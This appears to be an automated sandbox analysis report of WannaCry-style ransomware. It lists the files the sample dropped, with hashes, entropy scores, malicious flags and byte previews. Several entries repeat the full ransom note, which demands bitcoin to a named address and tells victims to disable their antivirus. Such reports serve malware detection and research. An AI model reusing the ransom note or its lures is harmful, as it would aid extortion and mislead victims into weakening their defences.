                                SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                Malicious:false
                                Reputation:unknown
                                Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                C:\ProgramData\Microsoft\AppV\Setup\@WanaDecryptor@.exe.lnk

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Dec 31 15:12:56 2022, mtime=Sat Dec 31 15:12:56 2022, atime=Fri May 12 01:22:56 2017, length=245760, window=hide
                                Category:dropped
                                Size (bytes):577
                                Entropy (8bit):5.168523111223376
                                Encrypted:false
                                SSDEEP:12:8HwpzYNbfMQMtUNgsJUoBjAuZoMEwJwU+GtwU+GlmCt:8L+Vcg0AuvE5nG2nGlm
                                MD5:D5ADA753FFB2696EFF2847209F1F5501
                                SHA1:6FF9F1D03DFB0A85CA9EB44E83E7C330AA1578AF
                                SHA-256:62BEC4FD603EFBB85E05335DF2F7EAB315E5A8310822901526F121B2FADC971C
                                SHA-512:7E6A028C69CF82986789CE9A4780B704220C9F7D0554B47FC329CA3A227380EBDEFB885635015F94C29917F071EEA462890E2CAE9A7E1322C4D673844672242C
                                Malicious:true
                                Reputation:unknown
                                Preview:L..................F.... ....{..5...{..5.......................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._.....Y.5....Y.5....t.2......J.. .@WANAD~1.EXE..X......?V..?V.......b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y...........0-.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226533..............n4UB.. .|..o..,........P..#.....n4UB.. .|..o..,........P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

                                C:\ProgramData\Microsoft\AppV\Setup\OfficeIntegrator.ps1.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5256
                                Entropy (8bit):7.962480048813014
                                Encrypted:false
                                SSDEEP:96:oK0M4EJ2fQp5CgXPtcMey1r1Vb3w8Exj/YhwkINjAu+/YaR4Z/Ba3fZ8RviOPlO:AwJ2fQpVefK1VTjeUQMYmuBZdlO
                                MD5:F54B26E7593691E1CAFCE8E100BE0BA1
                                SHA1:491B8A1A890860F917388127207F18D6F0505077
                                SHA-256:13D06D50A131A3FE0819554D88F9CFE72414C62DE018944F7D0EEB221884D401
                                SHA-512:9373B6159F9B78B2F510D7323C242CF4491555B8F9D72013D29873841DEDFFFFA2B830970CD4495696A7B0ABD82CF570DB7143DF0C4B4FB213AA5E84EFB53980
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....ul...m..oV..A.%.h..:...../=...U.Xq..n.^SZ.HI..4`G..L...5.&.%!H]@........@.m.....#OG.FE..?..$.../#\.I.......t.......K.+..(D..4.....q.v._.CI(J./L....Y.M......].......,...9..4.S.WC..xE0..........aS.....}..<.y......N..=G......n.!...&^..m.h...ji....h.......c..)..R...!...?...$O......!.g.9.%.0>.x;........P......#4........[.......v..F..W..u...w....1cv=\........y.;y.l..M ...7.......\....V..........n...k.C.W.B.-..[8M.!.w.....R_.n+"......_......j......../....?Z......f..QU.....G...JE.?.RV..wz/......epv...M.R.....o..u.o..t....Q...x..yVih...4.b.....7....s.+O.@.E|_...-A..MD.cw.z.......Xsx..)....lh..~W.G.....<5.-.>#...L....Y..n~5#:r_.\.\.h.+H..yH..F...dVc.X.....fc.........08...A....eP.......5.......z.R.A...I}3..~...M.g..:.......r2..m.....z..Z.4..)S8..zus#.+.........Q..X.L.zi.1......+B..B..k6.M....hf@...C~w...=&:!.;...3.n.Ee..G..%.t..3.|.>.b..../HKP....3...^!.A...{.....5..\$.{.]B..j....E...@..m..n..MP..i..k6..~-N.a..a.....&L}

                                C:\ProgramData\Microsoft\ClickToRun\ProductReleases\46183AC3-59FF-4B8C-8BF8-6C3D1F20FAC7\en-us.16\stream.x64.en-us.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):548472
                                Entropy (8bit):7.999696144120696
                                Encrypted:true
                                SSDEEP:12288:wpBJJhXkMAH/5C49/sbbENpxk4rA+iMrwze8H/8E:IJrUMA8bEPC4Zive8f8E
                                MD5:E5F1FEB1F16CF8D1492B9AC4D63A7D2D
                                SHA1:345941C449DDF3683870D9FA23C8648B5A4ADCF3
                                SHA-256:CEB55A2F6841585612B0B27D67E931FF512AF5164E75F3F9144948819F05BEF1
                                SHA-512:C99C7E43D2D9AF24CD30F5E84F4A324B26C6A5F9C4A3D4DEA7222ED4028E7F3D83C0A3E30AC13998DA70B0C17A3F6BAD1D432863F3F539A199F74891897FA783
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....B..........B(^i..o...;.?....A..w|a.....p.jY.Rs>.....\.A..=A.......OK..E.3..X..;...7..,....l.....\..}...Z{A9.'......o7..',.T.i..+Qi=..|....K.....[..6hb..QgN.................!c5.m..5....a....|..A..F9w...Y.g.Lr...^d.5bL.i`Z(Q.fO..h...*....9....Q]......u.Y.x.....8..T>_.G.J.zo.~B.....R.!.l...N..E..zP.b.h...>n4bQBc.[.<.%.....uo..4.p#H.Z..[..yhG.a..F?...xj"\|.E..zTt..jjoYBD...NCV..PI....`.9V!a.j...A..I)....3I.....:.....m=L..4\@.a...|!. ).g.#....;.S..._.m.c..K.}?......R.- .t/C.A.._"-......8..+..l.Q..!.Y^.......9....g..5i.{.L.mb.....2.....L......A...b..%..........n.h.-_....R_..X{xL..m8.F.G.)K.Sy.s..:...H.".-s.............P...+i.n.+c...e..q=...l.Mb...].3.......{......2$...M@.@$_w..-..'.'.q.....Y.......\......pi.z...#.;....[.*....a.x.......+K.$.w<E.G!Y..F....s......]..&g...).B.{..b.)..z...H...A..u.|RR{.....*..n<c...S....\rs..Q..F....td`..+.dmw4^r..n..P...BG.......Xr..=.^....<.j..C4k.[.B..+.../..9.1...t.W ..jp.. ))N...n....=.Q..p.t..

                                C:\ProgramData\Microsoft\ClickToRun\ProductReleases\46183AC3-59FF-4B8C-8BF8-6C3D1F20FAC7\x-none.16\stream.x64.x-none.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):2972600
                                Entropy (8bit):7.999939498778598
                                Encrypted:true
                                SSDEEP:49152:cm4ePQ5QKdH7QYSUURSpp7bGKQnr/AcYsMrBQSJiXyCTu8EL+MRscTLt:cIQxVjUIp7bPA/nY3dJjMks+Lt
                                MD5:AB67F3514364D0EE4F586DF1382C17A5
                                SHA1:1A53793D146FCB7BF9B1BA27123C2024F77F3D84
                                SHA-256:6023143E65F54F39B2A1E76BB511A75F40E73D80D0DBB7891B51FC830D238292
                                SHA-512:F4EA53870F1BD3504CEEC03E548BDA8902B24282F7436A90138E9BFB42B80A0833F884D12161E9A00458A81500ED57A97C9FB9ABBA5A454DFB6A797AFEDE8863
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....0.....FPR.........k.....G_..@.$....q.f....8.$.....64t4f.<....~S..M....P`.....e.R.!^S....:O.I.D.9@...S.r....N.S......M..`.9.R.q*..vi7.=.CS.h...A.q......@.V(....F.S......D{\$)..5yB........N..{z.:.B4,/lp0Y.`..z..4........9.....I.RM&..3.f$..s...\.....Z-......1..M([G.....e.x.~...bt.~..9...{.................B~...U?...Wk\AU...R.g..._..uH.....o6_:.&E1.....U.mV.:.d..`..r.M/..s.y.,...c .....5.G`.:....h0..}.j.C........."d..A[...|Z.....`<..1o..&..I.....d.O..'l..5[.w{.....HM*o.H.F..!O|\8.....a..{".....f.7.. .,"..SUd.^g..?CRP~.\=....B.#.!A1&.~$.j.Gi.d.QD..UMs..4.....`,.. ...._..J...:50..!<.......faY.qj..tmk..KI.+q......,..M.-.:55.ZCP.8.u...9.c.p;..h.[gY.lR.6I..w..6_.w.GY5.B.......&Q6..G.1....g......Z.m}.ti.D...........j...N=4..o.-.....l...-.\.....d6I..p....20@.9.#.....z..........2........F...+EV...C.k?cv..l..;..-........S1...O..w.C.=.....).I.Uz8...t....c.T...=&r..@j....&..lxZ9Dk..C.\a..*.......gW..NuG (...go.s.I.....>.H...uBOo..%..pZHA.

                                C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):130040
                                Entropy (8bit):7.998646644689255
                                Encrypted:true
                                SSDEEP:3072:DgYx3Q0Sapu3016Gd1V0xCUCykJNtewXt15jZPetE2I:DD3ii6K1Vn0+tnl85I
                                MD5:265367F96240E1B083E332B2D221864A
                                SHA1:3634670A86FD99B0B27B2DB0D548F8469604153E
                                SHA-256:BD6DBB44E81F502BF7F68CCC835DF66CF69A3869F3338BD3D00AC13C0D04DA57
                                SHA-512:D439EA321F7BBB55494DC066D7153FECC9D62E8D9DA40B738FA0576A5F4D2CEE5C988C150798E3E4842AE7C0822EDA88871C29886217CCA752553DD99C261FFA
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.......n..z..3.?e.X.s...k..b..6....w=5.]....c.?.0..p......#N..3wYU...f.%..?.B8........,$.`L:...r..f.#..MY.S..?.D...2...V?~......zHg.VG0...^THH.=..m.dU..Qi.g._..}........q.J%....E.x.6.Z.&.r..j...FL.^[qk.._.)...RLx.7:.....;......). e._....ZS..O..V.............yX..z.......Q....}$b. ].....F.........w.?_.@.i.%.5....j+...gH~......2`.2l..9.|tH.p..B.e..$.C.....'.E.T.....$rY..e".4....6.......F.%....oca...Z.i...?.HP.%.&.......v_Ta..w......'F.T....5@^d...O.4.........F{Y..UF..a.X...4'...`..]Y..B.hl..&.%...I.%.6.e..Vo.<O.\.wb\......A.L.7sLs..cpq2/....E~....,ud.=...0..'..j..!.a.5T.W.1..&_.A/.g..Y ).ij.....^....;.[........L.....e...@.......m5.....J~p.[.>..h&4.Q.^....^sB:!..zG.Dn..l.L...F........._..!..Q.nU?..X;.....O.+&x77...9....<.6;...5.l..|......b...(Q*.+2.P.).RQK....@.....{Jb....j=V..3.E#....G....:.).!..J.Ub.8.q.1......A[g......K...L...bTU.&......S...D..0...^w.....ke.....D.!f?...x..J....m....h..=.#"c.X.b.;..!.!*.:r*...H.l.9on.....$.

                                C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):44776
                                Entropy (8bit):7.995869848132826
                                Encrypted:true
                                SSDEEP:768:sS47au+7FMM0Dsdy9EiWJRG+Hb12MDior975OUtIWnrHd:sS47au2yQQ9ENJsFM+oBlOUFnrHd
                                MD5:FB1A86132A5642F7A1E5C1BB4A8CF6F3
                                SHA1:F7F168C34A57BC0DCF1C2BD133A3AA813A66BD4A
                                SHA-256:F736E17854745CC81BA3DB1D794D3B5691CF12585F19DB9E71F0D1D230E047C6
                                SHA-512:733C68825A1CDCF400ADF4EB5F64E80CA11F1E55242BFC2C504A9F5CE924E405D46F5094B4C33F511CED0F8F90D8321E89593D8E800EFC1320B3BF0F0754B1A6
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.....H.w.....=.:.n....g.0..F......C)...........(..h.J..._U.Ww.......b....[o.....@B.r+!.}......H<s.k..._.).K..o>nA........?.z.'[....n..{....?...2.7*T.......V...6.]$....H.Y.+.q..B.@M....(..x.&u....b!#..(..'...T.;xi......v...[.8...VXf.......z[..bm...0.p \............_x ....P..?.v.zF....t.-..\Z.w..N..w.1....5.....U.....N`.`.|$.B.]....l.....`.wgb.A....t.w!....vOG.q.M3...@...../..:...-.nY.J.....N.a..N. ._..D.nM.P`u..../...;O.....s.D..N.&.kDq.9"..A....sH..eI...YH.......@....t>Y...5.I....Ord....W...........|.6...Az..].1v8*.'V'.&Km...XL....-.fh+.d...<p.....X..k........tU.....r...:`.[Q`p.A.4z@C....;}.r.3....D....fO.A9.".>Db.....L.l..+!.G}q.e...._.l..-V.cX.f.N...O....f...V..h..-..v}..>...Q.T.2...*G....~n.....E.g.w...z...m...\..bv|?...q.{.{.............YZ.3.t..B....cj..Hm..L.X.........l.....8.e.!u.Bp-e....vSmr..E....l..dn..Z.*...KS..R.?bq..5&. .{{7...."..d..j.YT.N...#.7x..Aq..p.pl....X.......L 9-..t...M-'...+U....uS./...'.Q.CCfO.|Y...

                                C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):29160
                                Entropy (8bit):7.994211201577926
                                Encrypted:true
                                SSDEEP:768:kOt/8oGMb6ACTrJZy5MjQoOOwDS6dwQm18/lef:nGEYZZyGjeKJdAef
                                MD5:0F271D24D1273AF854DB0366A8ADFB2D
                                SHA1:DC6A12708EA9EEC24FCCBB6E490B4947F7870C8A
                                SHA-256:D73DF23ECACF7F24752414A13C297819A558F947B71705BA1FAFF1BBD026CCD5
                                SHA-512:5F6C309915C6426AE03DC159C83DEBAD5973BD58075DEE1F1A93AA1338C103A9DF3E1112819B425C72CAED500F98FFCAD5D42C6C2894100DCADAC86A5D4BC2DA
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!..........1.S9...D._...1.h....Y.}j.g?Y...ZQvV.{....`Q4W........b@l..|.14.N......j.M....cl...j}a..........E.S...........q..... f.,#Z.h].."'.^..3..?.t.`.....W.....+q)..w1+.#.N.|....HV.B..[da.W..o...4.B..n....*jz^.q..6s.....;.|.......R.I.nzm.....{,..u......p......E\D`...w....~...a.....=..bP.A..P^...QU.R.1.>1&rb%.ko...-.3z`%Y~...+..Y..?.m.YFl..IIQ=.....{.HW.{...8A.h...`......Y....c....$.1].Yg....Q.K84...K,............aF.| .r.@.g.....h.Z.t_.....A...S..-s...#tP.e...al.........TA.O..>5..-.<....a.E.9.....b.2...........+.X....UZ......Q.|.b...A.....uDY..k.C.)./.g'..+S.../.l,.B8...Pm,............-.k.CQ...1.L F.iV..Z?X.)..@.#G..v.?.`........o.N...R..zf.[>.K..#.(k.b[.17..Z.v.h.9......W.z.;.....C|C....Q.V.loG?X.#....F........WN..x.....{.Y.3.wq$'5.d.E. y..P..B.-.....7.o..).....d.w.g.nk......Ppb..Au.....U.....(-...w..q./.b..L..y\.v.qIh..}...#.].....+.K.;...]..z`.+(.1.....\?R9.7I....TK...Q.....|/.K.x..j.w.3...U/}."....N.....h....k..P.M...

                                C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):39672
                                Entropy (8bit):7.995996326109371
                                Encrypted:true
                                SSDEEP:768:eLDEl0FLrRrcLRWLL/ECf3/Q5lCvzlXxWOx4VBinpkWQln:eLDElyrRILRWPRfPQbCv+O1p3Qln
                                MD5:D8D89BCF07D7A08C49868F16702E22F9
                                SHA1:E712452F90B2510CCC3ED01E498E57CD8CD86243
                                SHA-256:FBC09743DC17EEF2C995424E8DF2F318F57B08440F7952E5286BF4305413EAB2
                                SHA-512:13CC1D315B634CCDEAE6EB47F04C2EC8947323C4A59A9155545531AACE624A0A129E2626FA6F2BBE2073B3156E133976C812A31F2E355614B39962BE5A284B63
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....k..3...8...s..2?dN|.Y..,...i........P.5y...uF.....6c.@z........0.. *f.yM..........Z&.@..9l5.&.r...F..R\.[#?..4...^Wc.qDW.E...R$.S)...p...3....>1..0]..'z=.1.l........P.(..r.bG.}..OGg&......Q'.....<......06.....Kt..E#s......p....)."0...;u/....Z.............W6..Q.l.Qm.w....Z..G..@...8r.a....U.a...+......ok..yg..toB.n.....`6.U..*.0.s..}Y>..%U9.-b6..'..(#o.e.....{.6...6k...P-..;.'G$.l.$....%.=.......G.....`X.....1..7.L.i 1#\f`n....`&)...d@..U._.../.....%......9....M.....-x.`/.-.=....(..G....6.{..3..O...D...x$xi.,mF K.I....]........c....#kq......s._.Cj.. -....sT.Q....vt6.W._*.m..=N.(/?......LC1._Uu...^..x..7..."..jh.+..C.>M.e..\'...L....Yo.,j.....7....{.....f.."..?4.O^_.L...?.G.9..9..........Z..n.m.Z..e.4....w.f3..5g..v0c..t5.............ZK........M$....4.q.W}5>.q..\.&Y9*k.%..`-...x....u{..=.....cW@".3[..e.s.|..nzq.L '.f.9....Y......Q.....*..........y/.....6.......ls0rr...G......'.]..!f:A.s..wU).1.a...@D.....i...Y.D8.K>..'=.....O.

                                C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):130040
                                Entropy (8bit):7.99848498698783
                                Encrypted:true
                                SSDEEP:3072:x9/8h/IPnT43FLk0suNK2Pbfj15+qxcNoqZ1:x4/8TMPpFjPXcNZ
                                MD5:7DB85EFBDAE418F5BD9D2F31B8C5B978
                                SHA1:DC5D420E72EA845F112372ED198D41453C505999
                                SHA-256:87F38C6BF0F758B7BB1679BF298876E440A1E362110945E5EB6D0CEC9623054D
                                SHA-512:1E7930CA17B3CF8280FDB3D501A18F93585077B69998DF97EC887CD80D614A78C180D0FE974C086DCC280616A93E47DA21D536264233A86591949369037CD8BD
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.........E..3H.....'...{..x....k......4...:......0.).k......s...i.m..Z...B..'d6.....5V.....Z.c[....I...S..-.#.g..=.%..>EC7k).z.8.K._d.(.....y..z.o.._.'1.v..[q..7x.v..N..!.p..z.NU7....>....a3..lt....,s.....J...!..c..C....m{.G..`mLt.....F@.Fb................C..Q1.7...'...(..g..y......h.....s7n...hG.....n.......`m.S.|ij.I3.....=..T.......-.P..F.@...m.$E(!...A.UV."..7..n..-.E+=.F|.=...A....R.vk(..m....H..\.D.vFy.*......lT.....sg..zj.C.....z.T...>g[.E..1#.rW.@..`..T..=9K}..IZ.}m.g3v..#..$.<.....Ut.1.4;.}#9..(.'..=.%......PK...._.#K\H7..L\..k.<7}`.~....,5.J..b,Z.#..48`......v.|.t....@..{...`9.?...v.GP.'or......^..6....`B.pFWy......q...?\ ....>y!...A."......X...8x..!.~..a..k..=..^Au7.p...B........r.-...+_aK.....+......@T...3...........3...$..h.7.....=...E...X:.L.t...TQk....b.~b.."..R.."/...7X...m.NE.{.0.G......=..U..{.......[ ...'#~3W.4)....X....7.w!...f.....m..y.J.r..E.J^.FG.....$)s........J.Bb..$r.S.&.TD....+..1([y..s..m..+=k..

                                C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):29160
                                Entropy (8bit):7.9931204101305715
                                Encrypted:true
                                SSDEEP:768:5+jDsbJu/B1z4xGn7HfkiyeB8TAJR6rZeoL+:Vu/rcMnbyeiAD6rt+
                                MD5:C9728F394D26644958614D1AAB935630
                                SHA1:1BD2DB4EC4CE9493AA65C95CBAA7C08C16FCA978
                                SHA-256:49BCC2379A2E2307A271AB077A724D216E9E8204A6BDA27E09A8C47C6773D99E
                                SHA-512:D11252BAC2267E8B66B8F5C31DDE75CAC3DDC4CAD91029E5EB7BBDD85CBB384E726B4F9F14A7A0D8986234AFFB8B8597C54AEC8A195E43E6241084B51C865A9F
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.........-..HGmp.....xf5...+r......`..\D>.....v.....yI...-]...J^...G.y..O..#.Wz_.....YY..-p.z.q|...i+3K/...LNh.<....uI.?.i.LbN.(.e..S.yr.T..M..]4.+.tom.."...(.Q/.h........X....u.r....^-.u.3bQP.5...7v...Q}.^U!..{4-.).1..u."....|... Q...\k..,j..h.....p......k..#...>\.V..t.~.......E.3.]..S?l....._.(.T......4.....,.c.r.=.r..t._...i...tAyhP._y.t+.."p..HYF.<..R.>..X.UC..%.....a...Ww.st..g..Wm...\d.}..+c.+d.%...w...9X`.w...'.[:....z@.+..DNjc..y\.+.:.6.6..$....R.......i...}.zb.....v(k......b.w`..p...=..$..nC.^.w..sI..=..._UR.U.R%^~3..a.......B.x....P......|......z!..Q..~3...$...J..A.N....b....M.2.Q.E3.vm.k1....i....p...t..>...)...e...d..p..O!.Y.._."4U...}.69.2...6tl.....|..)W.w.~x9..a..5q0.F....................Qd_.....a../..0...`.".(J..`....0........r.dr..../....:..N7w..4.kmT.A.;..b..Uf.[.%..$.s..U.<.%...+...v..U...X...%hX.E`.'.#..?......!05......W..a.... }.R..<.L.........!X.....O.....{....H....2.O.w3.}..f>...P........r)v.W.61

                                C:\ProgramData\Microsoft\Diagnosis\@Please_Read_Me@.txt

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):933
                                Entropy (8bit):4.708686542546707
                                Encrypted:false
                                SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                Malicious:false
                                Reputation:unknown
                                Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                C:\ProgramData\Microsoft\Diagnosis\@WanaDecryptor@.exe.lnk

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Dec 31 15:12:56 2022, mtime=Sat Dec 31 15:12:56 2022, atime=Fri May 12 01:22:56 2017, length=245760, window=hide
                                Category:dropped
                                Size (bytes):577
                                Entropy (8bit):5.168523111223376
                                Encrypted:false
                                SSDEEP:12:8HwpzYNbfMQMtUNgsJUoBjAuZoMEwJwU+GtwU+GlmCt:8L+Vcg0AuvE5nG2nGlm
                                MD5:D5ADA753FFB2696EFF2847209F1F5501
                                SHA1:6FF9F1D03DFB0A85CA9EB44E83E7C330AA1578AF
                                SHA-256:62BEC4FD603EFBB85E05335DF2F7EAB315E5A8310822901526F121B2FADC971C
                                SHA-512:7E6A028C69CF82986789CE9A4780B704220C9F7D0554B47FC329CA3A227380EBDEFB885635015F94C29917F071EEA462890E2CAE9A7E1322C4D673844672242C
                                Malicious:true
                                Reputation:unknown
                                Preview:L..................F.... ....{..5...{..5.......................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._.....Y.5....Y.5....t.2......J.. .@WANAD~1.EXE..X......?V..?V.......b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y...........0-.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226533..............n4UB.. .|..o..,........P..#.....n4UB.. .|..o..,........P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

                                C:\ProgramData\Microsoft\Diagnosis\EventStore.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):98584
                                Entropy (8bit):7.9980147883959445
                                Encrypted:true
                                SSDEEP:3072:SnXrLHcc2rDQgT8egmbaxI6XGnP8aL+ykHf/4:MHR2PLoNm2+fLEHf/4
                                MD5:2E1731A01DB5EA215463DA5A12C02F28
                                SHA1:846C1DEB7171C6998C44F2156DE8E0442CF88781
                                SHA-256:46A2D2F914980754B6ACBA6C5DF32B462E1B24AD1AFF461198F8E0069B896CCA
                                SHA-512:72ECBD239678745A796BF45DA956E7AB09CDA776138A5F108644DDA89DC40FAB07C9229F18434F03FCA5DA4ECA48C808ABD8C6C98C6824686E1776C52E4B25F1
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!......m..J.W.$x.fq5]~..X..c.h.@9.._.......C.W..k..n`.Vn*b...u/.'....h...-FHTp....]sy.y.B.O....B;.)#...hN.^w.K.o.#".*O.*Y.Z...}.?h,.=r...u.a....)....x:|....0T "..D0.1.UHC.JQ.qA...`.g.._."@".....O.s.P.x`$...C...I.0............&.lW.....?y...C.....h#.............-J..+.....5.....`...V......|..P.......#0*M..E......g7...~.........d.l..r.E.m......z..n....(.}(.......?..T.H.......;..e%.....1.D:~...)uy9.7.=lvs.....E..R.......@D........4..A..@#....=...U.....C..;1.3....hf.. S....$w.$...D:... a...j./..$!oAOa....M.X\|..)u..ii.T..o..(.C.dD.9....Q.......qJ..w<.k..Gx..[.4.o../.>.9.D.O.2b.^..K..0_..&...".Ka....t...|*Pb.XR.!*S..k...x.7.P...>4.......J.{j.."....#Z..s..t.A:..Qg..R.0~_.>.JI0/.E.=.).0..L..h.@...E9...X.|....-o...].s...6.....[...k...w..I($8..p7.5.56fO.I..&dVD(.E.a.<..7.Z.w......,|[..Y....?b)..R.J.$......G../..9.{..4.v.8.N.m..x`..g-.... ]..AT...oc.rp..f.\.&...v...MQ?.Z..LP.....L.G$2...l.|>............_.O[.......,.u.u.....C}...)nj...

                                C:\ProgramData\Microsoft\Diagnosis\ScenariosSqlStore\@Please_Read_Me@.txt

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):933
                                Entropy (8bit):4.708686542546707
                                Encrypted:false
                                SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                Malicious:false
                                Reputation:unknown
                                Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                C:\ProgramData\Microsoft\Diagnosis\ScenariosSqlStore\@WanaDecryptor@.exe.lnk

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Dec 31 15:12:56 2022, mtime=Sat Dec 31 15:12:56 2022, atime=Fri May 12 01:22:56 2017, length=245760, window=hide
                                Category:dropped
                                Size (bytes):577
                                Entropy (8bit):5.168523111223376
                                Encrypted:false
